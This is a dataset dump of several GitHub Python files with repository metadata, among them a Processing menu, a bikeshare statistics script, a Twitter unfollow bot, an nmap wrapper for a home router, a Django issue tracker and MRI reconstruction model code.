blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c575a9c2ea029a2616fb7aa34165dc2b935eb63a | 3b863f7e7efea09f5a120eb8c323e5a3742b82b3 | /LevelSelection_Page/LevelSelection_Page.pyde | 23a2c39a016791744f8abcef5874cfa5058a187b | [] | no_license | TriceG/DNA_Project | b6096fbc91c35621b659dd5154a1972a9674d881 | 469df295120fbfe32070fd973c55f36b2af99341 | refs/heads/master | 2021-01-19T21:32:24.914550 | 2017-06-20T14:15:27 | 2017-06-20T14:15:27 | 88,661,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | pyde | def setup():
background(37, 154, 247)
size(800, 500)
def draw():
fill(225)
rectMode(CENTER)
#beginerButton
rect(400, 175, 150, 50)
#intermediateButton
rect(400, 275, 239, 50)
#advancedButton
rect(400, 375, 190, 50)
textSize(30)
#title
text("Select a Level:", 300, 100)
fill(0)
#button text
text("BEGINER", 337, 185)
text("INTERMEDIATE", 292, 285)
text("ADVANCED", 316, 385)
def mouseClicked():
#BEGINER button clicked
if mouseX > 325 and mouseX < 475 and mouseY > 150 and mouseY < 200:
#go to easy mode
#Import Easy Mode
background(194, 247, 37)
#INTERMEDIATE button clicked
if mouseX > 280.5 and mouseX < 519.5 and mouseY > 250 and mouseY < 300:
#go to medium mode
#Import Medium mode
background(47, 247, 37)
#ADVANCED button clicked
if mouseX > 305 and mouseX < 495 and mouseY > 350 and mouseY < 400:
#go to hard mode
#Import Hard Mode
background(27, 167, 20) | [
"none@none"
] | none@none |
02a649e42a7cdd51c91d3a54eaaf62522d71e35f | ca65d98cb41b0da151158640a7be9ea0253d20ac | /floating-real_csv.py | d87635573111d1572d95586785cfa81f1a64c22d | [
"Apache-2.0"
] | permissive | ashokn414/python_floating_conversions | adebb5c2ca4839fed51a3c37c8d5176da4fbb2bb | 7a132c703272e6651daf555816171f04ee5b5555 | refs/heads/main | 2023-08-25T05:19:57.347582 | 2021-11-03T04:52:02 | 2021-11-03T04:52:02 | 422,618,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,245 | py | import csv
#########################################
def convertToInt(a):
mant = 0
power_count = -1
mantissa_int = 0
expo = a[1:6]
s = a[0]
mant_str = a[6:]
for i in mant_str:
mantissa_int += (int(i) * pow(2, power_count))
power_count -= 1
mant = mantissa_int + 1
sign_bit = int(s)
exponent_bias = int(expo, 2)
exponent_unbias = exponent_bias - 15
real_no = pow(-1, sign_bit) * mant * pow(2, exponent_unbias)
return real_no
###################################################
filename = "floating_values.csv"
fields = []
rows = []
with open(filename,'r') as csvfile:
reader = csv.reader(csvfile)
fields = next(reader)
for row in reader:
if(row!=[]):
rows.append(row)
for row in rows:
a = convertToInt(row[0])
b = convertToInt(row[1])
row[0] = a
row[1] = b
#print("the "+str(rows.index(row))+" co-ordinate is "+"("+str(a)+","+str(b)+")")
fields = ["normalized x coordinate","normalized y cordinate"]
filename = "float_to_normalized_values.csv"
with open(filename,'w') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(fields)
writer.writerows(rows) | [
"noreply@github.com"
] | noreply@github.com |
8547e7d4e69d717ba39c389d0b216825fb5e2613 | 7e1f0e8ca64e92e11247446f9f1d1433c5e9d25e | /UnFollow.py | c41254739a344ee99b82e6c2ec6623bbfa9a548c | [] | no_license | Dmen1478/CSC-450--TWITTER-BOT | 84e279a8af0f3475b222a6e9ba16352af9aaad97 | c9f617b5d6111c7d4c007def87c5109ea7bec586 | refs/heads/master | 2020-08-24T21:02:01.530237 | 2019-10-22T19:58:33 | 2019-10-22T19:58:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,279 | py | import pyautogui
import cv2
import numpy as np
from time import sleep
import pyperclip
def unfollow():
pyautogui.PAUSE = .3
pyautogui.screenshot('img/screenshot.png')
img_rgb = cv2.imread('img/screenshot.png')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread('img/profile.png', 0)
res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
threshold = 0.8
loc = np.where(res >= threshold)
#if len(loc[0]) == 0:
for npt in zip(*loc[::-1]):
pyautogui.moveTo(npt[0], npt[1] + 5)
pyautogui.moveRel(+10, +15)
pyautogui.click()
break
sleep(3)
pyautogui.screenshot('img/screenshot.png')
img_rgb = cv2.imread('img/screenshot.png')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread('img/profilefollowers.png', 0)
res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
threshold = 0.9
loc = np.where(res >= threshold)
for npt in zip(*loc[::-1]):
pyautogui.moveTo(npt[0], npt[1] + 5)
pyautogui.moveRel(+5, +5)
pyautogui.click()
break
sleep(3)
pyautogui.screenshot('img/screenshot.png')
img_rgb = cv2.imread('img/screenshot.png')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread('img/tweetbutton.png', 0)
res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
threshold = 0.8
loc = np.where(res >= threshold)
for npt in zip(*loc[::-1]):
pyautogui.moveTo(npt[0], npt[1] + 5)
pyautogui.moveRel(+50, +150)
pyautogui.click()
break
pyautogui.hotkey('ctrl', 'a')
pyautogui.hotkey('ctrl', 'c')
eew = str(pyperclip.paste())
eew = eew.split()
users = []
for c in eew:
if c.startswith('@'):
users.append(c)
f = open('followers.txt', 'r+')
for i in users:
f.write(i + '\n')
f.close()
pyautogui.click()
pyautogui.screenshot('img/screenshot.png')
img_rgb = cv2.imread('img/screenshot.png')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread('img/profilefollowing.png', 0)
res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
threshold = 0.9
loc = np.where(res >= threshold)
for npt in zip(*loc[::-1]):
pyautogui.moveTo(npt[0], npt[1] + 5)
pyautogui.moveRel(+5, +5)
pyautogui.click()
break
sleep(2)
pyautogui.PAUSE = .9
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.hotkey('end')
pyautogui.PAUSE = .3
f = open('unfollowedcount.txt', 'r+')
num = f.read()
num = int(num)
curunfollowed = num
while curunfollowed <= 90:
pyautogui.screenshot('img/screenshot.png')
img_rgb = cv2.imread('img/screenshot.png')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread('img/atSign.png', 0)
res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
threshold = .9
loc = np.where(res >= threshold)
dothething(loc)
pyautogui.scroll(1000)
def dothething(loc):
f = open('followers.txt', 'r')
g = f.read()
f.close()
f = open('unfollowedcount.txt', 'r+')
num = f.read()
num = int(num)
curunfollowed = num
for npt in zip(*loc[::-1]):
if curunfollowed >= 90:
print('Too many unfollowed today. Edit unfollowedcount.txt to unfollow more.')
quit()
pyautogui.moveTo(npt[0] - 4, npt[1] + 11)
pyautogui.dragRel(300, 0, duration=.7)
pyautogui.hotkey('ctrl', 'c')
copy = pyperclip.paste()
copy = copy.split()
name = copy[len(copy)-1]
n = open('unfollowedusers.txt')
if name in g or 'Follows' in name or name in n.read():
pass
else:
print('Unfollowing {}'.format(copy[len(copy)-1]))
pyautogui.moveRel(165, -10)
pyautogui.click()
pyautogui.screenshot('img/screenshot.png')
img_rgb = cv2.imread('img/screenshot.png')
img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)
template = cv2.imread('img/unfollowbtn.png', 0)
res = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)
threshold = 0.8
loc = np.where(res >= threshold)
for npt in zip(*loc[::-1]):
pyautogui.moveTo(npt[0], npt[1] + 5)
pyautogui.moveRel(+20, +20)
pyautogui.click()
break
curunfollowed += 1
f.seek(0)
f.write(str(curunfollowed))
f.truncate()
s = open('unfollowedusers.txt', 'a+')
s.seek(0)
s.write(str(copy[len(copy)-1]) + '\n')
s.truncate()
s.close()
f.close()
| [
"noreply@github.com"
] | noreply@github.com |
f880b1a41db9a22cb56ee96ae77447fe83dbfb54 | b3322943e3b37392c3029caf84b724dac5b00729 | /bikeshare_2.py | 5d667d5aebd5060130b7144d6a34cfdd2af46153 | [] | no_license | paran93/Bike-SHARE | 97af32dd7d250dd182ede3213216ec2c9dcb7248 | 1f628de7f60bfffb04be515f1ba8fd4d42ddad7e | refs/heads/main | 2022-12-20T03:00:39.002344 | 2020-10-17T02:49:34 | 2020-10-17T02:49:34 | 304,783,822 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,887 | py |
import pandas as pd
import numpy as np
import collections
CITY_DATA = {'chicago': 'chicago.csv',
'new york city': 'new_york_city.csv',
'washington': 'washington.csv'}
cities = [*CITY_DATA]
options = ["a", "b", "c"]
diction = dict(zip(options, cities))
months = ['january', 'february', 'march', 'april', 'may', 'june', 'all']
days = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'all']
def get_filters():
"""
Asks user to specify a city, month, and day to analyze.
Returns:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
"""
print('\nHello! Let\'s explore some US bikeshare data!\n')
option = input("Can you choose a city by typing the letter corresponding:\n"
" a) chicago , b) new york city , c) washington\n ").lower().strip()
while option not in options:
option = input(
'Invalid input, please choose a city by typing the letter corresponding:\n'
' a) chicago , b) new york city , c) washington\n ').lower().strip()
city = diction[option]
month = input(
"And also choose a month please: [january , february , march , april , may , june , all]?\n ").lower().strip()
while month not in months:
month = input(
'Invalid input please choose from the options provided: [january , february , march , april , may , '
'june , all]?\n ').lower().strip()
day = input(
"Lastly, which day do you want to study: [sunday , monday "
", tuesday , wednesday , thursday , friday , saturday, "
"all]?\n ").lower().strip()
while day not in days:
day = input(
"Invalid input please choose from the options provided: [sunday , monday , tuesday , wednesday , "
"thursday , friday , saturday, all]?\n ").lower().strip()
print('-' * 40)
return city, month, day
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
df = pd.read_csv(CITY_DATA[city])
df['Start Time'] = pd.to_datetime(df['Start Time'])
df['month'] = df['Start Time'].dt.month
df['day_of_week'] = df['Start Time'].dt.day_name()
if month != 'all':
months_list = ['january', 'february', 'march', 'april', 'may', 'june']
month = months_list.index(month) + 1
df = df[df['month'] == month]
if day != 'all':
df = df[df['day_of_week'] == day.title()]
return df
def time_stats(df, month, day):
"""Displays statistics on the most frequent times of travel."""
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
if month == 'all':
mode_month = df['month'].mode()[0]
i = 0
for mon in df['month']:
if mon == mode_month:
i += 1
print('The most-common-month prize goes to: {}\nand its nu'
'mber of occurrences is {}\n '.format(mode_month, i))
if day == 'all':
mode_day = df['day_of_week'].mode()[0]
ii = 0
for d in df['day_of_week']:
if d == mode_day:
ii += 1
print('And the most-common-month prize goes to: {}\nand its nu'
'mber of occurrences is {}\n '.format(mode_day, ii))
mode_time = df['Start Time'].dt.hour.mode()[0]
iii = 0
for t in df['Start Time'].dt.hour:
if t == mode_time:
iii += 1
print('Last but not least, the most-common-start-hour prize goes to: {}\nand its nu'
'mber of occurrences is {}\n '.format(mode_time, iii))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-' * 40)
def station_stats(df):
"""Displays statistics on the most popular stations and trip."""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
start_stations = df['Start Station']
mode_start_station = start_stations.mode()[0]
n_s_mode = len(df[start_stations == mode_start_station])
print('The most-common-start-station prize goes to: {}\nand its nu'
'mber of occurrences is {}\n '.format(mode_start_station, n_s_mode))
end_stations = df['End Station']
mode_end_station = end_stations.mode()[0]
n_e_mode = len(df[end_stations == mode_end_station])
print('And the most-common-end-station prize goes to: {}\nand its nu'
'mber of occurrences is {}\n '.format(mode_end_station, n_e_mode))
combinations = list(zip(start_stations, end_stations))
n_combinations = 0
mode_trip = collections.Counter(combinations).most_common(1)[0][0]
for combination in combinations:
if combination == mode_trip:
n_combinations += 1
print('Last but not least, the most-common-trip prize goes to: {}\nand its nu'
'mber of occurrences is {}\n '.format(mode_trip, n_combinations))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-' * 40)
def trip_duration_stats(df):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
# display total travel time
total_travel = df['Trip Duration'].sum() / 3600
print('The Total Trip time for the timeframe and city chosen is: {} hours\n'.format(round(total_travel, 2)))
# display mean travel time
mean_travel = df['Trip Duration'].mean() / 60
print('For an average of: {} minutes\n'.format(round(mean_travel, 2)))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-' * 40)
def user_stats(df, city):
"""Displays statistics on bikeshare users."""
print('\nCalculating User Stats...\n')
start_time = time.time()
# Display counts of user types
types = list(set(df['User Type']))
print('Now for the types of existing customers in the criteria chosen, there is {} for a total of'
' {} types. \n'.format(types, len(types)))
df_types = df['User Type']
for df_type in types:
print("{}s: {}\n".format(df_type, len(df[df_types == df_type])))
# Display counts of gender
if city != "washington":
gender = list(set(df['Gender'].fillna("Gender not provided")))
df_genders = df['Gender']
print('And the Genders of existing customers for the criteria chosen are {} for a total of'
' {} genders. \n'.format(gender, len(gender)))
for df_gender in gender:
print(
"{}s: {} customer\n".format(df_gender, len(df[df_genders.fillna("Gender not provided") == df_gender])))
print('Also the majority of the our customers in this'
' criteria are {}s.\n'.format(df["Gender"].mode()[0]))
# Display earliest, most recent, and most common year of birth
df_sorted = df.sort_values(by='Start Time', ascending=False)
print('And now the first customer we dealt with in the criteria chosen was born in {}.\n'.format(
int(df_sorted["Birth Year"].iloc[-1])))
print('The most recent customer was born in {}.\n'.format(int(df_sorted["Birth Year"].iloc[0])))
print('The most common birth year is {}.\n'.format(int(df["Birth Year"].mode()[0])))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-' * 40)
def main():
while True:
city, month, day = get_filters()
df = load_data(city, month, day)
time_stats(df, month, day)
station_stats(df)
trip_duration_stats(df)
user_stats(df, city)
i=5
while True:
print_data = input('\nWould you like to print some data? Enter yes or no\n')
if print_data.lower().strip() != 'yes':
break
else:
print(df.head(i))
print(df.tail(i))
i += 5
restart = input('\nWould you like to restart? Enter yes or no.\n')
if restart.lower().strip() != 'yes':
break
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
a20ec94cdd08e187e7c7cf1132457f3b19af8131 | cecd42a1c39ff00b7eb56ef244ef3ae3f884522c | /migrations/versions/388b36ae960d_.py | 36a0af9537bd943fb6643893aa024b5a3c83a9cc | [] | no_license | ylin1992/fyyur | 9b6129a725a1af1d01154424cc60d945eb11a48b | e926a263114b007870619f37dc9261f01878a530 | refs/heads/main | 2023-09-02T15:07:08.645111 | 2021-10-30T09:49:12 | 2021-10-30T09:49:12 | 422,549,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | """empty message
Revision ID: 388b36ae960d
Revises: 4585432e4a99
Create Date: 2021-10-28 20:46:38.170649
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '388b36ae960d'
down_revision = '4585432e4a99'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('Artist', sa.Column('website', sa.String(length=120), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('Artist', 'website')
# ### end Alembic commands ###
| [
"linyeah2011@gmail.com"
] | linyeah2011@gmail.com |
7ed5d2c3249c5f83bae48f12740eff65e85957ff | 98b453391da7cc5d2990ccc399991329aed5dda3 | /Joe_Cox_PyNmap.py | 04f14525b7373b5b0149a5232362caba14f6f448 | [] | no_license | jonoco52/CSIA-450-Public | c26b7901dc9c978668451df0eb0f10bd91e2529c | d39a12f3b4a8bdfe22789bf0c57a4318abe2a8cc | refs/heads/master | 2022-07-05T15:36:59.273128 | 2020-05-13T16:35:46 | 2020-05-13T16:35:46 | 261,049,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,839 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 5 08:29:37 2020
@author: Joseph
"""
__author__ = "Joe Cox"
__email__ = "jocox@students.columbiabasin.edu"
__date_ = "Spring 2020"
__version__ = "0.0.1"
# LIBRARIES
from datetime import date
import os
import pickle
import json
import subprocess
from difflib import SequenceMatcher
# SET VARIABLES
my_dir = '/Users/Joseph/Downloads/830199374'
my_pickle = my_dir + '/data.pickle'
my_json = my_dir + '/data.json'
port_list = ['192.168.1.1:80', '192.168.1.1:23', '192.168.1.1:22']
nmap_path = '/Users/Joseph/Desktop/nmap-7.70/nmap.exe'
nmap_network = '192.168.1.1'
def create_directory():
if(os.path.isdir(my_dir)) == False:
try:
os.mkdir(my_dir)
print ("INFO: The directory was created:", my_dir)
except OSError:
print ("ERROR: Failed to create directory:", my_dir)
else:
print ("INFO: The directory already exists:", my_dir)
def create_date_string():
date_str = date.today().strftime("%m%d%y")
return (date_str)
def write_files(input_data, file_name):
#write the pickle file
with open(str(my_dir) + '/' + str(file_name) + '.pickle', 'wb') as fp:
pickle.dump(input_data, fp)
fp.close()
# write the json file
with open(str(my_dir) + '/' + str(file_name) + '.json', 'w') as fp:
json.dump(input_data, fp)
fp.close()
def read_files(seq, file_name):
port_list = []
# read the pickle file
with open (str(my_dir) + '/' + str(file_name) + '.pickle' , 'rb') as fp:
port_list = pickle.load(fp)
fp.close()
print("pickle:", port_list)
port_list = []
# read the json file
with open(str(my_dir) + '/' + str(file_name) + '.json' ,'r') as fp:
port_list = json.load(fp)
fp.close()
print("json:", port_list)
def run_nmap():
nmap_out = subprocess.run([nmap_path, "-T4", nmap_network], capture_output=True)
nmap_data = nmap_out.stdout.splitlines()
#nmap_data = 'nmap output'
return nmap_data
create_directory()
input_data = run_nmap()
print(input_data)
file_name = create_date_string()
write_files(input_data, file_name)
import filecmp
path = my_dir
comparison = filecmp.dircmp(path+ '051220.json' ,path+ '051220.pickle')
common_files = ','.join(comparison.common)
left_only_file = ','.join(comparison.left_only)
right_only_file = ','.join(comparison.right_only)
with open(path+'folder_diff.txt' , 'w') as folder_report:
folder_report.write("common files: "+common_files+ '\n')
folder_report.write('\n'+"only in json file"+left_only_file+'\n')
folder_report.write('\n'+"only in pickle file"+right_only_file+'\n')
| [
"noreply@github.com"
] | noreply@github.com |
17c45d94efa8018ba6165c376fcf4a8981629f48 | c5bc44b4bb7aa0b8e6df81c198e9803eb0f060ce | /pro_tracker/issue/views.py | 7a365ad081af225db4a559345972d6c6de5b7ae1 | [] | no_license | hyperloop11/Progress-tracking-website | 4821b1c17b04b223b1a20610b1612b11b0a54ce3 | 7c3bd77a0b0605994b001544fc809c1e52a18f82 | refs/heads/master | 2023-06-21T12:06:26.531345 | 2021-08-05T07:21:37 | 2021-08-05T07:21:37 | 298,636,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,218 | py | from django.shortcuts import render, get_object_or_404
from django.views.generic import (
ListView, DetailView,
CreateView, UpdateView,
)
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from .models import Issue
from django.contrib.auth.models import User, Permission
from .forms import IssueUpdateForm, CommentForm
from django.views.generic.edit import FormMixin
from django.urls import reverse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from notifications.signals import notify
def home(request):
context = {
'posts': Issue.objects.all()
}
return render(request, 'issue/home.html', context)
class IssueListView(ListView):
model = Issue
template_name='issue/home.html'
context_object_name='posts'
paginate_by=6
#ORDERING
def get_queryset(self):
return Issue.objects.filter(completed=False).order_by('-id')
class OldIssueListView(ListView):
model = Issue
template_name='issue/home.html'
context_object_name='posts'
paginate_by=6
#ORDERING
def get_queryset(self):
return Issue.objects.filter(completed=True).order_by('-id')
class IssueDetailView(FormMixin, DetailView):
model = Issue
form_class=CommentForm
def get_success_url(self):
return reverse('issue-detail', kwargs={'pk': self.object.id})
def get_context_data(self, **kwargs):
context = super(IssueDetailView, self).get_context_data(**kwargs)
context['form'] = CommentForm(initial={'issue': self.object.id, 'author': self.request.user})
return context
def post(self, request, *args, **kwargs):
self.object = self.get_object()
form = self.get_form()
if form.is_valid():
curr_issue = Issue.objects.get(pk=self.object.id)
for user in curr_issue.author.all() :
if self.request.user != user:
notify.send(
request.user,
recipient=user,
verb = 'commented on your issue',
target=curr_issue,
)
return self.form_valid(form)
else:
return self.form_invalid(form)
def form_valid(self, form):
form.save()
return super(IssueDetailView, self).form_valid(form)
class IssueCreateView(LoginRequiredMixin, CreateView):
model = Issue
fields= ['title', 'content', 'priority']
def form_valid(self, form):
form.save()
form.instance.author.add(self.request.user)
return super().form_valid(form)
def view_type(self):
return "Create"
class IssueUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Issue
form_class = IssueUpdateForm
# leader =self.get_object().author.first()
# #author = forms.ModelChoiceField(queryset=User.objects.exclude(leader))
# form_class.fields['author'].queryset=User.objects.exclude(leader)
#form_class=UserForm
# def __init__(self, *args):
# super(IssueUpdateView, self).__init__(*args)
# leader =self.get_object().author.first()
# self.fields['author'].queryset = User.objects.exclude(leader)
def form_valid(self, form):
form.save()
form.instance.author.add(self.request.user)
return super().form_valid(form)
def test_func(self):
post= self.get_object()
if self.request.user in post.author.all() or self.request.user.has_perm('issue.change_issue'):
return True
else:
return False
def view_type(self):
return "Update"
#to fix kwargs in issue list view, better not inherit from listView and make a function.
def UserIssue(request,username):
#user = get_object_or_404( User,User.objects.get(username=username))
this_user = get_object_or_404(User, username=username)
posts = this_user.issue_set.filter(completed=False).order_by('-id')
paginator = Paginator(posts, 2) # Show 4 blogs per page.
page_number = request.GET.get('page', 1)
try:
page_obj = paginator.page(page_number)
except PageNotAnInteger:
page_obj = paginator.page(1)
except EmptyPage:
page_obj = paginator.page(paginator.num_pages)
context = {
'this_user': this_user,
#'posts': this_user.issue_set.all().order_by('-id'),
'posts': page_obj,
}
return render(request, 'issue/user_issues.html', context)
def UserIssueArchives(request,username):
this_user = get_object_or_404(User, username=username)
posts = this_user.issue_set.filter(completed=True).order_by('-id')
paginator = Paginator(posts, 2) # Show 4 blogs per page.
page_number = request.GET.get('page', 1)
try:
page_obj = paginator.page(page_number)
except PageNotAnInteger:
page_obj = paginator.page(1)
except EmptyPage:
page_obj = paginator.page(paginator.num_pages)
context = {
'this_user': this_user,
#'posts': this_user.issue_set.all().order_by('-id'),
'posts': page_obj,
}
return render(request, 'issue/user_issues.html', context) | [
"="
] | = |
90a5b73f0f60f6ea592b94c522795c396d50b70b | bcc4476c551f29595be8bb4d3b498412751ad376 | /util/model.py | bce4b377300f14ebc3d9e65ed48e6f33cb58152a | [] | no_license | mikgroup/mdd_mri | 93e98ed974a175fcfc145190c14d9242518b4d6f | 8255f4b476977075737d7ea64ded16060015df25 | refs/heads/master | 2022-11-30T16:43:06.399095 | 2020-08-11T00:49:18 | 2020-08-11T00:49:18 | 285,473,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,226 | py | #!/usr/bin/env python
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional
import util.complex as cp
'''
Contains defintions for models
'''
def roll(tensor, shift, axis):
if shift == 0:
return tensor
if axis < 0:
axis += tensor.dim()
dim_size = tensor.size(axis)
after_start = dim_size - shift
if shift < 0:
after_start = -shift
shift = dim_size - abs(shift)
before = tensor.narrow(axis, 0, dim_size - shift)
after = tensor.narrow(axis, after_start, shift)
return torch.cat([after, before], axis)
def torch_fftshift(im):
t = len(im.shape)
n = int(np.floor(im.shape[t-3]/2))
m = int(np.floor(im.shape[t-2]/2))
P_torch1 = roll(roll(im,m,t-2),n,t-3)
return P_torch1
def torch_ifftshift(im):
t = len(im.shape)
n = int(np.ceil(im.shape[t-3]/2))
m = int(np.ceil(im.shape[t-2]/2))
P_torch1 = roll(roll(im,m,t-2),n,t-3)
return P_torch1
def maps_forw(img, maps):
return cp.zmul(img[:,None,:,:,:], maps)
def maps_adj(cimg, maps):
return torch.sum(cp.zmul(cp.zconj(maps), cimg), 1, keepdim=False)
def fft_forw(x, ndim=2):
return torch_fftshift(torch.fft(torch_ifftshift(x), signal_ndim=ndim, normalized=True))
def fft_adj(x, ndim=2):
return torch_fftshift(torch.ifft(torch_ifftshift(x), signal_ndim=ndim, normalized=True))
def mask_forw(y, mask):
return y * mask[:,None,:,:,None]
def sense_forw(img, maps, mask):
return mask_forw(fft_forw(maps_forw(img, maps)), mask)
def shuffle_for_fft(x):
dims = x.size()
x = x.reshape((1, dims[1]//2, 2, dims[2], dims[3])) # Reshaping to seperate real and imaginary for each coil
x = x.permute((0, 1, 3, 4, 2)) # Permuting so last channel is real/imaginary for pytorch fft
return x
def shuffle_after_fft(x):
x = x.permute((0, 1, 4, 2, 3)) # Permuting so that real/imaginary dimension is next to coil dimension
dims = x.size()
x = x.reshape((1, dims[1]*2, dims[3], dims[4])) #Reshaping to combine real/imaginary dimension and coil dimension
return x
class FFTInterpolate(nn.Module):
def __init__(self, size):
super(Interpolate, self).__init__()
self.up_size = size
def forward(self, x):
input_size = tuple(x.size()[2:4])
total_padding = [goal-current for goal, current in zip(self.up_size, input_size)]
padding_tup = (0, 0) + sum([(dim//2,dim//2+dim%2) for dim in total_padding[::-1]], tuple()) #padding: 0, 0, left, right, top, bottom
x = shuffle_for_fft(x)
x = fft_forw(x)
x = nn.functional.pad(x, padding_tup)
x = fft_adj(x)
x = shuffle_after_fft(x)
return x
class SimpleSenseModel(torch.nn.Module):
def __init__(self, mask):
super(SimpleSenseModel, self).__init__()
self.mask = mask
def forward(self, x):
return mask_forw(fft_forw(x), self.mask)
def adjoint(self, y):
return fft_adj(mask_forw(y, self.mask))
class DecoderForward(torch.nn.Module):
def __init__(self, decoder, mask):
super(DecoderForward, self).__init__()
self.decoder = decoder
self.A = SimpleSenseModel(mask)
def forward(self, x):
out = self.decoder(x)
out = shuffle_for_fft(out)
out = self.A(out)
out = shuffle_after_fft(out)
return out
class MDD(torch.nn.Module):
def __init__(self, depth=5, k_out=3, k=256, filter_size=1, upsample_mode='bilinear', up_size=2, net_input=None):
super(MDD, self).__init__()
# Initialize parameters
self.depth = depth
self.k_out = k_out
self.k = k.append(k[-1]) if type(k) is list else [k]*(self.depth+1) # Extend by one to account for extra final layer
self.filter_size = filter_size.append(filter_size[-1]) if type(filter_size) is list else [filter_size]*len(self.k)
self.upsample_mode = upsample_mode
# Initialize upsampling sizes
if type(up_size) is not list: # Scale factor given
one_dim_up_size = [16*(up_size**i) for i in range(1, self.depth+1)]
self.up_size = list(zip(one_dim_up_size, one_dim_up_size))
print(self.up_size)
else:
self.up_size = up_size
# Assertions to make sure inputted parameters match expectations
assert self.depth+1 == len(self.k) == len(self.filter_size)
assert self.depth == len(self.up_size)
# Create layers according to the following:
# Conv -> ReLU -> Batchnorm -> Upsample (x Depth)
# Conv -> ReLU -> BatchNorm -> Conv (x 1)
layer_list = []
for i in range(self.depth):
if self.upsample_mode == "fft_pad":
upsample_layer = nn.FFTInterpolate(self.up_size[i])
else:
upsample_layer = nn.Upsample(size=self.up_size[i], mode=self.upsample_mode)
to_pad = int((self.filter_size[i] - 1) / 2)
padder = nn.ReflectionPad2d(to_pad) # Padding so that Conv layer output has expected spatial output
layer_list.append(nn.Sequential(
padder,
nn.Conv2d(self.k[i], self.k[i+1], self.filter_size[i], bias=False),
nn.ReLU(),
nn.BatchNorm2d(self.k[i+1], affine=True),
upsample_layer))
to_pad = int((self.filter_size[self.depth] - 1) / 2)
layer_list.append(nn.Sequential(
nn.ReflectionPad2d(to_pad),
nn.Conv2d(self.k[self.depth], self.k[self.depth], self.filter_size[self.depth], bias=False),
nn.ReLU(),
nn.BatchNorm2d(self.k[self.depth], affine=True),
nn.ReflectionPad2d(to_pad),
nn.Conv2d(self.k[self.depth], self.k_out, self.filter_size[self.depth], bias=False)))
self.layers = nn.Sequential(*layer_list)
def forward(self, x):
return self.layers(x)
| [
"sukrit.arora@berkeley.edu"
] | sukrit.arora@berkeley.edu |
